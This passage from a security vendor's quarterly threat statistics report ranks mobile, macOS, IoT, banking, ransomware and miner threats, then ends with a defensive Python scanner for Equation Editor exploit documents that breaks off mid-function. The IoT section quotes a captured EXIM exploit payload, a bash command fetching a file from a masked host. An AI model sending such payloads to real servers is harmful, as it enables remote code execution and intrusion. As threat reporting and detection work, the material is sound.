The most frequently created objects belonged to the [Trojan-Banker.AndroidOS.Svpeng](<https://securelist.com/the-android-trojan-svpeng-now-capable-of-mobile-phishing/57301/>) (30.79% of all detected mobile bankers), Trojan-Banker.AndroidOS.Wroba (17.16%), and Trojan-Banker.AndroidOS.Agent (15.70%) families.\n\n### Top 20 mobile malware programs\n\n_Note that this malware rating does not include potentially dangerous or unwanted programs related to RiskTool or adware._\n\n| | Verdict | %* \n---|---|--- \n1 | DangerousObject.Multi.Generic | 44.37 \n2 | Trojan.AndroidOS.Boogr.gsh | 11.31 \n3 | DangerousObject.AndroidOS.GenericML | 5.66 \n4 | Trojan.AndroidOS.Hiddapp.cr | 4.77 \n5 | Trojan.AndroidOS.Hiddapp.ch | 4.17 \n6 | Trojan.AndroidOS.Hiddapp.cf | 2.81 \n7 | Trojan.AndroidOS.Hiddad.em | 2.53 \n8 | Trojan-Dropper.AndroidOS.Lezok.p | 2.16 \n9 | Trojan-Dropper.AndroidOS.Hqwar.bb | 2.08 \n10 | Trojan-Banker.AndroidOS.Asacub.a | 1.93 \n11 | Trojan-Banker.AndroidOS.Asacub.snt | 1.92 \n12 | Trojan-Banker.AndroidOS.Svpeng.ak | 1.91 \n13 | Trojan.AndroidOS.Hiddapp.cg | 1.89 \n14 | Trojan.AndroidOS.Dvmap.a | 1.88 \n15 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.86 \n16 | Trojan.AndroidOS.Agent.rt | 1.81 \n17 | Trojan-SMS.AndroidOS.Prizmes.a | 1.58 \n18 | Trojan.AndroidOS.Fakeapp.bt | 1.58 \n19 | Trojan.AndroidOS.Agent.eb | 1.49 \n20 | Exploit.AndroidOS.Lotoor.be | 1.46 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile solutions that were attacked._\n\nAs per tradition, first place in our Top 20 for Q2 went to the DangerousObject.Multi.Generic verdict (44.77%), which we use for malware detected using [cloud technologies](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). Cloud technologies are deployed when the antivirus databases lack data for detecting a piece of malware, but the company's cloud already contains information about the object. 
This is basically how the latest malicious programs are detected.\n\nSecond and third places were claimed by Trojan.AndroidOS.Boogr.gsh (11.31%) and DangerousObject.AndroidOS.GenericML (5.66%). These verdicts are assigned to files recognized as malicious by our [machine-learning systems](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>).\n\nFourth, fifth, sixth, seventh, and thirteenth places were taken by members of the Trojan.AndroidOS.Hiddapp family, whose task is to secretly download ads onto the infected device. If the user detects the adware app, the Trojan does not prevent its deletion, but re-installs the app at the first opportunity.\n\nEighth position belonged to Trojan-Dropper.AndroidOS.Lezok.p (2.16%). This Trojan displays persistent ads, steals money through SMS subscriptions, and inflates hit counters for apps on various platforms.\n\nNinth and fifteenth places were taken by members of the Hqwar dropper family (2.08% and 1.86%, respectively); this malware most often conceals banking Trojans.\n\nTenth and eleventh places went to members of the Asacub family of financial cyberthreats: Trojan-Banker.AndroidOS.Asacub.a (1.93%) and Trojan-Banker.AndroidOS.Asacub.snt (1.92%). 
Like the Hqwar droppers, this family lost a lot of ground in Q2 2019.\n\n### Geography of mobile threats\n\n_Geography of mobile malware infection attempts, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153325/it-threat-evolution-q2-2019-statistics-5.png>)\n\n#### Top 10 countries by share of users attacked by mobile malware\n\n| | Country* | %** \n---|---|--- \n1 | Iran | 28.31 \n2 | Bangladesh | 28.10 \n3 | Algeria | 24.77 \n4 | Pakistan | 24.00 \n5 | Tanzania | 23.07 \n6 | Nigeria | 22.69 \n7 | India | 21.65 \n8 | Indonesia | 18.13 \n9 | Sri Lanka | 15.96 \n10 | Kenya | 15.38 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000)._ \n_** Unique users attacked by mobile malware as a percentage of all users of Kaspersky mobile solutions in the country._\n\nAt the head of Q2's Top 10 countries by share of attacked users is Iran (28.31%), which took second place in this rating in Q1 2019. Iran displaced Pakistan (24%), which now occupies fourth position.\n\nMost often, users of Kaspersky security solutions in Iran encountered the Trojan.AndroidOS.Hiddapp.bn adware Trojan (21.08%) as well as the potentially unwanted apps RiskTool.AndroidOS.FakGram.a (12.50%), which seeks to intercept messages in Telegram, and RiskTool.AndroidOS.Dnotua.yfe (12.29%).\n\nLike Iran, Bangladesh (28.10%) rose one position in our Top 10. 
Most often, users in Bangladesh came across various adware apps, including AdWare.AndroidOS.Agent.f (35.68%), AdWare.AndroidOS.HiddenAd.et (14.88%), and AdWare.AndroidOS.Ewind.h (9.65%).\n\nThird place went to Algeria (24.77%), where users of Kaspersky mobile solutions most often ran into the AdWare.AndroidOS.HiddenAd.et (27.15%), AdWare.AndroidOS.Agent.f (14.16%), and AdWare.AndroidOS.Oimobi.a (8.04%) adware apps.\n\n### Mobile banking Trojans\n\nIn the reporting period, we detected **13,899** installation packages for mobile banking Trojans, down to nearly half the number recorded in Q1 2019.\n\nThe largest contribution was made by the creators of the Svpeng family of Trojans: 30.79% of all detected banking Trojans. Trojan-Banker.AndroidOS.Wroba (17.16%) and Trojan-Banker.AndroidOS.Agent (15.70%) came second and third, respectively. The much-hyped Asacub Trojan (11.98%) managed only fifth.\n\n_Number of installation packages for mobile banking Trojans detected by Kaspersky, Q3 2018 \u2013 Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153349/it-threat-evolution-q2-2019-statistics-6.png>)\n\n**Top 10 mobile banking Trojans**\n\n| | Verdict | %* \n---|---|--- \n1 | Trojan-Banker.AndroidOS.Asacub.a | 13.64 \n2 | Trojan-Banker.AndroidOS.Asacub.snt | 13.61 \n3 | Trojan-Banker.AndroidOS.Svpeng.ak | 13.51 \n4 | Trojan-Banker.AndroidOS.Svpeng.q | 9.90 \n5 | Trojan-Banker.AndroidOS.Agent.ep | 9.37 \n6 | Trojan-Banker.AndroidOS.Asacub.ce | 7.75 \n7 | Trojan-Banker.AndroidOS.Faketoken.q | 4.18 \n8 | Trojan-Banker.AndroidOS.Asacub.cs | 4.18 \n9 | Trojan-Banker.AndroidOS.Agent.eq | 3.81 \n10 | Trojan-Banker.AndroidOS.Faketoken.z | 3.13 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile antivirus that were attacked by banking threats._\n\nAlmost half our Top 10 mobile bankers in Q2 2019 is made up of modifications of the Trojan-Banker.AndroidOS.Asacub Trojan: four positions out of ten. 
However, this family's distribution bursts that we registered last quarter were not repeated this time.\n\nAs in Q1, Trojan-Banker.AndroidOS.Agent.eq and Trojan-Banker.AndroidOS.Agent.ep made it into the Top 10; however, they ceded the highest positions to the Svpeng family of Trojans, which is considered one of the longest in existence.\n\n_Geography of mobile banking threats, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153417/it-threat-evolution-q2-2019-statistics-7.png>)\n\n#### Top 10 countries by share of users attacked by mobile banking Trojans:\n\n| | Country* | %** \n---|---|--- \n1 | South Africa | 0.64% \n2 | Russia | 0.31% \n3 | Tajikistan | 0.21% \n4 | Australia | 0.17% \n5 | Turkey | 0.17% \n6 | Ukraine | 0.13% \n7 | Uzbekistan | 0.11% \n8 | Korea | 0.11% \n9 | Armenia | 0.10% \n10 | India | 0.10% \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000)._ \n_** Unique users attacked by mobile banking Trojans as a percentage of all users of Kaspersky mobile solutions in the country._\n\nIn Q2 2019, South Africa (0.64%) climbed to first place, up from fourth in the previous quarter. 
In 97% of cases, users in that country encountered Trojan-Banker.AndroidOS.Agent.dx.\n\nSecond place was claimed by Russia (0.31%), where our solutions most often detected members of the Asacub and Svpeng families: Trojan-Banker.AndroidOS.Asacub.a (14.03%), Trojan-Banker.AndroidOS.Asacub.snt (13.96%), and Trojan-Banker.AndroidOS.Svpeng.ak (13.95%).\n\nThird place belongs to Tajikistan (0.21%), where Trojan-Banker.AndroidOS.Faketoken.z (35.96%), Trojan-Banker.AndroidOS.Asacub.a (12.92%), and Trojan-Banker.AndroidOS.Grapereh.j (11.80%) were most frequently met.\n\n### Mobile ransomware Trojans\n\nIn Q2 2019, we detected **23,294** installation packages for mobile Trojan ransomware, which is 4,634 fewer than last quarter.\n\n_Number of installation packages for mobile banking Trojans, Q3 2018 \u2013 Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153440/it-threat-evolution-q2-2019-statistics-8.png>)\n\n#### Top 10 mobile ransomware Trojans\n\n| | Verdict | %* \n---|---|--- \n1 | Trojan-Ransom.AndroidOS.Svpeng.aj | 43.90 \n2 | Trojan-Ransom.AndroidOS.Rkor.i | 11.26 \n3 | Trojan-Ransom.AndroidOS.Rkor.h | 7.81 \n4 | Trojan-Ransom.AndroidOS.Small.as | 6.41 \n5 | Trojan-Ransom.AndroidOS.Svpeng.ah | 5.92 \n6 | Trojan-Ransom.AndroidOS.Svpeng.ai | 3.35 \n7 | Trojan-Ransom.AndroidOS.Fusob.h | 2.48 \n8 | Trojan-Ransom.AndroidOS.Small.o | 2.46 \n9 | Trojan-Ransom.AndroidOS.Pigetrl.a | 2.45 \n10 | Trojan-Ransom.AndroidOS.Small.ce | 2.22 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile solutions that were attacked by ransomware Trojans._\n\nIn Q2 2019, the most widespread family of ransomware Trojans was Svpeng: three positions in the Top 10.\n\n_Geography of mobile ransomware Trojans, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153507/it-threat-evolution-q2-2019-statistics-9.png>)\n\n#### Top 10 countries by share of users attacked 
by mobile ransomware Trojans:\n\n| | Country* | %** \n---|---|--- \n1 | US | 1.58 \n2 | Kazakhstan | 0.39 \n3 | Iran | 0.27 \n4 | Pakistan | 0.16 \n5 | Saudi Arabia | 0.10 \n6 | Mexico | 0.09 \n7 | Canada | 0.07 \n8 | Italy | 0.07 \n9 | Singapore | 0.05 \n10 | Indonesia | 0.05 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000)._ \n_** Unique users attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky mobile solutions in the country._\n\nThe leaders by number of users attacked by mobile ransomware Trojans, as in the previous quarter, were the US (1.58%), Kazakhstan (0.39%), and Iran (0.27%).\n\n## Attacks on Apple macOS\n\nQ2 witnessed several interesting events, three of which deserve special attention.\n\nA [vulnerability](<https://www.fcvl.net/vulnerabilities/macosx-gatekeeper-bypass>) was discovered in the macOS operating system allowing Gatekeeper and XProtect scans to be bypassed. Exploitation requires creating an archive with a symbolic link to the shared NFS folder containing the file. When the archive is opened, the file from the shared NFS folder is automatically downloaded by the system without any checks. The first malware exploiting this vulnerability was not long in coming; however, all the detected specimens were more likely test versions than actual malware.\n\nVulnerabilities detected in the Firefox browser ([CVE-2019-11707](<https://www.mozilla.org/en-US/security/advisories/mfsa2019-18/>), [CVE-2019-11708](<https://www.mozilla.org/en-US/security/advisories/mfsa2019-19/>)) allowed arbitrary code to be executed with a view to escaping the sandbox. After this information was made public, the first exploitations occurred. 
Using these vulnerabilities, cybercriminals dropped spyware Trojans from the Mokes and Wirenet families onto victim computers.\n\nAn interesting vector for delivering a malicious miner to victims was also [discovered](<https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/>). The attackers used social engineering and legitimate apps modified with malicious code. But even more interestingly, the malicious part consisted of a QEMU emulator and a Linux virtual machine, housing the miner. As soon as QEMU was launched on the infected machine, the miner started up inside its image. The scheme is so outlandish \u2013 both QEMU and the miner consume significant resources \u2013 that such a Trojan could not remain unnoticed for long.\n\n### Top 20 threats for macOS\n\n| | Verdict | %* \n---|---|--- \n1 | Trojan-Downloader.OSX.Shlayer.a | 24.61 \n2 | AdWare.OSX.Spc.a | 12.75 \n3 | AdWare.OSX.Bnodlero.t | 11.98 \n4 | AdWare.OSX.Pirrit.j | 11.27 \n5 | AdWare.OSX.Pirrit.p | 8.42 \n6 | AdWare.OSX.Pirrit.s | 7.76 \n7 | AdWare.OSX.Pirrit.o | 7.59 \n8 | AdWare.OSX.MacSearch.a | 5.92 \n9 | AdWare.OSX.Cimpli.d | 5.76 \n10 | AdWare.OSX.Mcp.a | 5.39 \n11 | AdWare.OSX.Agent.b | 5.11 \n12 | AdWare.OSX.Pirrit.q | 4.31 \n13 | AdWare.OSX.Bnodlero.v | 4.02 \n14 | AdWare.OSX.Bnodlero.q | 3.70 \n15 | AdWare.OSX.MacSearch.d | 3.66 \n16 | Downloader.OSX.InstallCore.ab | 3.58 \n17 | AdWare.OSX.Geonei.as | 3.48 \n18 | AdWare.OSX.Amc.a | 3.29 \n19 | AdWare.OSX.Agent.c | 2.93 \n20 | AdWare.OSX.Mhp.a | 2.90 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky security solutions for macOS that were attacked._\n\nOn the topic of most common threats in Q2, the Shlayer.a Trojan (24.61%) retained top spot. In second place is the adware app AdWare.OSX.Spc.a (12.75%) and in third AdWare.OSX.Bnodlero.t (11.98%), which pushed AdWare.OSX.Pirrit.j (11.27%) into fourth. Like last quarter, most of the Top 20 places went to adware apps. 
Among them, members of the Pirrit family were particularly prominent: five positions out of 20.\n\n### Threat geography\n\n| | Country* | %** \n---|---|--- \n1 | France | 11.11 \n2 | Spain | 9.68 \n3 | India | 8.84 \n4 | US | 8.49 \n5 | Canada | 8.35 \n6 | Russia | 8.01 \n7 | Italy | 7.74 \n8 | UK | 7.47 \n9 | Mexico | 7.08 \n10 | Brazil | 6.85 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000)._ \n_** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nIn terms of the geographical spread of macOS threats, France (11.11%), Spain (9.68%), and India (8.84%) retained their leadership.\n\nIn the US (8.49%), Canada (8.35%), and Russia (8.01%), the share of infected users increased, ranking these countries respectively fourth, fifth, and sixth in our Top 10.\n\n## IoT attacks\n\n### Interesting events\n\nIn the world of Linux/Unix threats, the most significant event was the active rise in the number of attacks exploiting a new [vulnerability](<https://www.exim.org/static/doc/security/CVE-2019-10149.txt>) in the EXIM mail transfer agent. In a nutshell, the attacker creates a special email and fills the recipient field with code to be executed on the vulnerable target mail server. The message is then sent using this server. EXIM processes the sent message and executes the code in the recipient field.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153528/it-threat-evolution-q2-2019-statistics-10.png>)\n\n_Intercepted attack traffic_\n\nThe screenshot shows a message whose RCPT field contains the shell script. The latter actually looks as follows: \n \n \n /bin/bash -c \"wget X.X.X.X/exm -O /dev/null\n\n### IoT threat statistics\n\nQ2 2019 demonstrated a significant drop in attacks via telnet: around 60% versus 80% in Q1. 
The assumption is that cybercriminals are gradually switching to more productive hardware enabling the use of SSH. \n \n| Service | Share \n---|--- \nSSH | 40.43% \nTelnet | 59.57% \n \n_Distribution of attacked services by number of unique IP addresses of attacking devices, Q2 2019_\n\nHowever, in terms of number of sessions involving Kaspersky Lab [honeypots](<https://encyclopedia.kaspersky.com/glossary/honeypot-glossary/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), we see a decline for SSH from 64% in Q1 to 49.6% in Q2. \n \n| Service | Share \n---|--- \nSSH | 49.59% \nTelnet | 50.41% \n \n_Distribution of cybercriminals' working sessions with Kaspersky Lab traps, Q2 2019_\n\n### Telnet-based attacks\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab telnet traps, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153555/it-threat-evolution-q2-2019-statistics-11.png>)\n\n#### **Top 10 countries by location of devices from which telnet-based attacks were carried out on Kaspersky Lab traps**\n\n| | Country | % \n---|---|--- \n1 | Egypt | 15.06 \n2 | China | 12.27 \n3 | Brazil | 10.24 \n4 | US | 5.23 \n5 | Russia | 5.03 \n6 | Greece | 4.54 \n7 | Iran | 4.06 \n8 | Taiwan | 3.15 \n9 | India | 3.04 \n10 | Turkey | 2.90 \n \nFor the second quarter in a row, Egypt (15.06%) topped the leaderboard by number of unique IP addresses from which attempts were made to attack Kaspersky Lab traps. 
Second place, by a small margin, went to China (12.27%), with Brazil (10.24%) in third.\n\nTelnet-based attacks most often used a member of the infamous Mirai malware family as ammunition.\n\n#### **Top 10 malware downloaded to infected IoT devices via successful telnet-based attacks**\n\n| | Verdict | %* \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 38.92 \n2 | Trojan-Downloader.Linux.NyaDrop.b | 26.48 \n3 | Backdoor.Linux.Mirai.ba | 26.48 \n4 | Backdoor.Linux.Mirai.au | 15.75 \n5 | Backdoor.Linux.Gafgyt.bj | 2.70 \n6 | Backdoor.Linux.Mirai.ad | 2.57 \n7 | Backdoor.Linux.Gafgyt.az | 2.45 \n8 | Backdoor.Linux.Mirai.h | 1.38 \n9 | Backdoor.Linux.Mirai.c | 1.36 \n10 | Backdoor.Linux.Gafgyt.av | 1.26 \n \n_* Share of malware type in the total amount of malware downloaded to IoT devices via successful telnet attacks._\n\nAs things stand, there is no reason to expect a change in the situation with Mirai, which remains the most popular malware family with cybercriminals attacking IoT devices.\n\n### SSH-based attacks\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab SSH traps, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153622/it-threat-evolution-q2-2019-statistics-12.png>)\n\n#### **Top 10 countries by location of devices from which attacks were made on Kaspersky Lab SSH traps**\n\n| | Country | % \n---|---|--- \n1 | Vietnam | 15.85 \n2 | China | 14.51 \n3 | Egypt | 12.17 \n4 | Brazil | 6.91 \n5 | Russia | 6.66 \n6 | US | 5.05 \n7 | Thailand | 3.76 \n8 | Azerbaijan | 3.62 \n9 | India | 2.43 \n10 | France | 2.12 \n \nIn Q2 2019, the Top 3 countries by number of devices attacking Kaspersky Lab traps using the SSH protocol were Vietnam (15.85%), China (14.51%), and Egypt (12.17%). 
The US (5.05%), which took second place in Q1 2019, dropped down to seventh.\n\n## Financial threats\n\n### Financial threat statistics\n\nIn Q2 2019, Kaspersky solutions blocked attempts to launch one or more types of malware designed to steal money from bank accounts on the computers of 228,206 users.\n\n_Number of unique users attacked by financial malware, Q2 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153645/it-threat-evolution-q2-2019-statistics-13.png>)\n\n### Attack geography\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products that faced this threat during the reporting period out of all users of our products in that country.\n\n_Geography of banking malware attacks, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153713/it-threat-evolution-q2-2019-statistics-14.png>)\n\n#### Top 10 countries by share of attacked users\n\n| | **Country*** | **%**** \n---|---|--- \n1 | Belarus | 2.0 \n2 | Venezuela | 1.8 \n3 | China | 1.6 \n4 | Indonesia | 1.3 \n5 | South Korea | 1.3 \n6 | Cyprus | 1.2 \n7 | Paraguay | 1.2 \n8 | Russia | 1.2 \n9 | Cameroon | 1.1 \n10 | Serbia | 1.1 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000)._ \n_** Unique users whose computers were targeted by banking Trojans as a percentage of all unique users of Kaspersky products in the country._\n\n#### Top 10 banking malware families\n\n| | **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | RTM | Trojan-Banker.Win32.RTM | 32.2 \n2 | Zbot | Trojan.Win32.Zbot | 23.3 \n3 | Emotet | Backdoor.Win32.Emotet | 8.2 \n4 | Nimnul | Virus.Win32.Nimnul | 6.4 \n5 | Trickster | Trojan.Win32.Trickster | 5.0 \n6 | Nymaim | Trojan.Win32.Nymaim | 3.5 \n7 | SpyEye | Backdoor.Win32.SpyEye | 3.2 \n8 | Neurevt | Trojan.Win32.Neurevt | 2.8 
\n9 | IcedID | Trojan-Banker.Win32.IcedID | 1.2 \n10 | Gozi | Trojan.Win32.Gozi | 1.1 \n \n_* Unique users attacked by this malware as a percentage of all users attacked by financial malware._\n\nIn Q2 2019, the Top 3 remained unchanged compared to the previous quarter. The leading positions in our Top 10, by a clear margin, went to the Trojan-Banker.Win32.RTM (32.2%) and Trojan.Win32.Zbot (23.3%) families. Their shares rose by 4.8 and 0.4 p.p. respectively. Behind them came the Backdoor.Win32.Emotet family (8.2%); its share, conversely, fell by 1.1 p.p. From the beginning of June, we noted a decrease in the activity of Emotet C&C servers, and by early Q3 almost all the C&C botnets were unavailable.\n\nWe also observe that in Q2 Trojan-Banker.Win32.IcedID (1.2%) and Trojan.Win32.Gozi (1.1%) appeared in the Top 10 families. They took ninth and tenth places, respectively.\n\n## Ransomware programs\n\n### Quarterly highlights\n\nAfter almost 18 months of active distribution, the team behind the GandCrab ransomware announced it was [shutting down the operation](<https://threatpost.com/gandcrab-ransomware-shutters/145267/>). According to our reports, it was one of the most common ransomware encryptors.\n\nIn Q2, distribution got underway of the new [Sodin](<https://securelist.com/sodin-ransomware/91473/>) ransomware (aka Sodinokibi or REvil), which was noteworthy for several reasons. There was the distribution method through hacking vulnerable servers, plus the use of a rare LPE exploit, not to mention the complex cryptographic scheme.\n\nAlso this quarter, there were a few high-profile ransomware infections in the computer networks of [city](<https://threatpost.com/ransomware-florida-city-pays-600k-ransom/145869/>) [administrations](<https://threatpost.com/second-florida-city-pays-hackers-500k-post-ransomware-attack/146018/>). This is not a new trend, since hacking corporate or municipal networks for extortion purposes is common enough. 
However, the mass nature of such incidents in recent years draws attention to the security of critical computer infrastructure, on which not only individual organizations but entire communities rely.\n\n### Number of new modifications\n\nIn Q2 2019, we identified eight new families of ransomware Trojans and detected 16,017 new modifications of these malware types. For comparison, Q1 saw 5,222 new modifications, three times fewer.\n\n_Number of new ransomware modifications, Q2 2018 \u2013 Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153736/it-threat-evolution-q2-2019-statistics-15.png>)\n\nThe majority of new modifications belonged to the Trojan-Ransom.Win32.Gen family (various Trojans are automatically detected as such based on behavioral rules), as well as Trojan-Ransom.Win32.PolyRansom. The large number of PolyRansom modifications was due to the nature of this malware \u2013 it is a worm that creates numerous mutations of its own body. It substitutes these modified copies for user files, and places the victim's data inside them in encrypted form.\n\n### Number of users attacked by ransomware Trojans\n\nIn Q2 2019, Kaspersky products defeated ransomware attacks against 232,292 unique KSN users. This is 50,000+ fewer than the previous quarter.\n\n_Number of unique users attacked by ransomware Trojans, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153800/it-threat-evolution-q2-2019-statistics-16.png>)\n\nThe busiest month for protecting attacked users was April (107,653); this is even higher than the figure for March (106,519), which marks a continuation of the upward trend seen in Q1. 
However, in May the number of attacked users began to fall, and in June they amounted to a little over 82,000.\n\n### Attack geography\n\n_Geographical spread of countries by share of users attacked by ransomware Trojans, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153826/it-threat-evolution-q2-2019-statistics-17.png>)\n\n#### Top 10 countries attacked by ransomware Trojans\n\n| | **Country*** | **% of users attacked by ransomware**** \n---|---|--- \n1 | Bangladesh | 8.81% \n2 | Uzbekistan | 5.52% \n3 | Mozambique | 4.15% \n4 | Ethiopia | 2.42% \n5 | Nepal | 2.26% \n6 | Afghanistan | 1.50% \n7 | China | 1.18% \n8 | Ghana | 1.17% \n9 | Korea | 1.07% \n10 | Kazakhstan | 1.06% \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000)._ \n_** Unique users whose computers were attacked by Trojan encryptors as a percentage of all unique users of Kaspersky products in the country._\n\n### Top 10 most common families of ransomware Trojans\n\n| | **Name** | **Verdict*** | **Percentage of attacked users**** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 23.37% \n2 | (generic verdict) | Trojan-Ransom.Win32.Phny | 18.73% \n3 | GandCrab | Trojan-Ransom.Win32.GandCrypt | 13.83% \n4 | (generic verdict) | Trojan-Ransom.Win32.Gen | 7.41% \n5 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 4.73% \n6 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 4.15% \n7 | Shade | Trojan-Ransom.Win32.Shade | 2.75% \n8 | PolyRansom/VirLock | Virus.Win32.PolyRansom, Trojan-Ransom.Win32.PolyRansom | 2.45% \n9 | Crysis/Dharma | Trojan-Ransom.Win32.Crusis | 1.31% \n10 | Cryakl | Trojan-Ransom.Win32.Cryakl | 1.24% \n \n_* Statistics are based on detection verdicts of Kaspersky products. 
The information was provided by Kaspersky product users who consented to provide statistical data._ \n_** Unique Kaspersky users attacked by a particular family of ransomware Trojans as a percentage of all users attacked by ransomware Trojans._\n\n## Miners\n\n### Number of new modifications\n\nIn Q2 2019, Kaspersky solutions detected 7,156 new modifications of miners, almost 5,000 fewer than in Q1.\n\n_Number of new miner modifications, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153850/it-threat-evolution-q2-2019-statistics-18.png>)\n\nThe largest number of new modifications was detected in April (3,101), nearly 1,000 more than in March 2019; the overall trend, however, is that fewer and fewer new miner modifications are appearing.\n\n### Number of users attacked by miners\n\nIn Q2, we detected attacks using miners on the computers of 749,766 unique users of Kaspersky products worldwide.\n\n_Number of unique users attacked by miners, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153917/it-threat-evolution-q2-2019-statistics-19.png>)\n\nThroughout the quarter, the number of attacked users gradually decreased – from 383,000 in April to 318,000 in June.\n\n### Attack geography\n\n_Geographical spread of countries by share of users attacked by miners, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153944/it-threat-evolution-q2-2019-statistics-20.png>)\n\n**Top 10 countries by share of users attacked by miners**\n\n| **Country*** | **% of users attacked by miners**** \n---|---|--- \n1 | Afghanistan | 10.77% \n2 | Ethiopia | 8.99% \n3 | Uzbekistan | 6.83% \n4 | Kazakhstan | 4.76% \n5 | Tanzania | 4.66% \n6 | Vietnam | 4.28% \n7 | Mozambique | 3.97% \n8 | Ukraine | 3.08% \n9 | Belarus | 3.06% \n10 | Mongolia | 3.06% \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000)._ \n_** Unique 
users whose computers were attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by cybercriminals during cyber attacks\n\nOver the past year, the Microsoft Office suite has topped our breakdown of the most attacked applications. Q2 2019 was no exception – the share of exploits for vulnerabilities in Microsoft Office applications rose from 67% to 72%. The growth was driven primarily by incessant mass spam mailings distributing documents with exploits for the [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), [CVE-2018-0798](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0798>), and [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>) vulnerabilities. All three are stack buffer overflows in the object-parsing code of the Equation Editor component (EQNEDT32.EXE) shipped with Microsoft Office, and they give remote code execution as soon as a crafted document is opened. Other Office vulnerabilities such as [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>) and [CVE-2017-8759](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759>) are also popular with cybercriminals.\n\nThe increasing popularity of exploits for Microsoft Office suggests that cybercriminals see it as the easiest and fastest way to deploy malware on victim computers. 
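Whatever the exact bug a spam-delivered document targets (CVE-2017-11882, CVE-2018-0798 or CVE-2018-0802), it has to embed a Microsoft Equation 3.0 OLE object for Office to launch EQNEDT32.EXE at all, which gives a triage check that is independent of the individual CVE. The scanner below is an added example written for this page, not Kaspersky code. It looks for the component's CLSID (0002CE02-0000-0000-C000-000000000046, stored little-endian in OLE structures) and its ProgID ("Equation.3") both in raw OLE2 files and inside RTF `\objdata` streams, after stripping the control words, whitespace and stray braces that attackers interleave with the hex digits to defeat naive string signatures. The sample documents are constructed for the example and are not real malware; the regexes and the ProgID list are this example's own assumptions.

```python
import re
import uuid

# CLSID of "Microsoft Equation 3.0" (EQNEDT32.EXE), the component patched by
# CVE-2017-11882 and CVE-2018-0802. OLE stores GUIDs little-endian, so we
# search for the bytes_le form.
EQUATION_CLSID = uuid.UUID("0002CE02-0000-0000-C000-000000000046")
EQUATION_CLSID_LE = EQUATION_CLSID.bytes_le

# ProgIDs under which the same component appears in an OLE1 object header
# (inside RTF \objdata) or in an RTF \objclass group (assumed list).
EQUATION_PROGIDS = (b"Equation.3", b"Equation.2")

_CONTROL_WORD = re.compile(rb"\\[A-Za-z]+-?[0-9]*[ ]?")  # \par, \bin12 ...
_CONTROL_SYMBOL = re.compile(rb"\\[^A-Za-z]")             # \', \*, \{, \} ...
_NON_HEX = re.compile(rb"[^0-9A-Fa-f]")


def rtf_groups(data: bytes, marker: bytes):
    """Yield the raw text following every occurrence of `marker` (e.g.
    b"\\objdata") up to the closing brace of the group that contains it,
    tracking nested groups and skipping backslash-escaped braces."""
    pos = 0
    while True:
        start = data.find(marker, pos)
        if start < 0:
            return
        i = start + len(marker)
        depth = 0
        while i < len(data):
            c = data[i:i + 1]
            if c == b"\\":
                i += 2                # \{ and \} are literal, not structure
                continue
            if c == b"{":
                depth += 1
            elif c == b"}":
                if depth == 0:
                    break
                depth -= 1
            i += 1
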